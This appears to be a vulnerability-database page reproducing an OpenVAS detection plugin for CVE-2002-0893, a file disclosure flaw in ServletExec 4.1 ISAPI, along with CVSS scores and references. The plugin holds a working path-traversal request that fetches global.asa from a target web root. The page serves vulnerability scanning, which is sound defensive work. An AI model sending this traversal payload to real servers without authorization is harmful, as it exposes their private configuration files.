Lucene search
Copyright (C) 2002 Matt MooreOPENVAS:136141256231010959HistoryNov 03, 2005 - 12:00 a.m.
ServletExec 4.1 ISAPI File Reading
2005-11-0300:00:00
Copyright (C) 2002 Matt Moore
plugins.openvas.org
22
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
AI Score
6.5
Confidence
Low
EPSS
0.004
Percentile
75.1%
By invoking the JSPServlet directly it is possible to read the contents of
files within the webroot that would not normally be accessible (global.asa, for example.)
# SPDX-FileCopyrightText: 2002 Matt Moore
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.10959");
script_version("2023-08-01T13:29:10+0000");
script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_cve_id("CVE-2002-0893");
script_name("ServletExec 4.1 ISAPI File Reading");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2002 Matt Moore");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_xref(name:"URL", value:"ftp://ftp.newatlanta.com/public/4_1/patches/");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/4795");
script_xref(name:"URL", value:"http://www.westpoint.ltd.uk/advisories/wp-02-0006.txt");
script_tag(name:"solution", value:"Download Patch #9 from the linked vendor FTP.");
script_tag(name:"summary", value:"By invoking the JSPServlet directly it is possible to read the contents of
files within the webroot that would not normally be accessible (global.asa, for example.)");
script_tag(name:"insight", value:"When attempting to retrieve ASP pages it is common to see many
errors due to their similarity to JSP pages in syntax, and hence only fragments of these pages
are returned. Text files can generally be read without problem.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
port = http_get_port(default:80);
# Uses global.asa as target to retrieve. Could be improved to use output of webmirror.nasl
url = "/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa";
req = http_get(item:url, port:port);
res = http_keepalive_send_recv(port:port, data:req);
if(!res)
exit(0);
if("OBJECT RUNAT=Server" >< res) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
exit(99);
Related
cvelist
cvelist
CVE-2002-0893
2002-08-31 04:00:00
cve
cve
CVE-2002-0893
2002-10-04 04:00:00
nessus
nessus
exploitdb
exploitdb
NewAtlanta ServletExec/ISAPI 4.1 - File Disclosure
2002-05-22 00:00:00
nvd
nvd
CVE-2002-0893
2002-10-04 04:00:00
openvas
openvas
ServletExec 4.1 ISAPI File Reading
2005-11-03 00:00:00
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
AI Score
6.5
Confidence
Low
EPSS
0.004
Percentile
75.1%
Related for OPENVAS:136141256231010959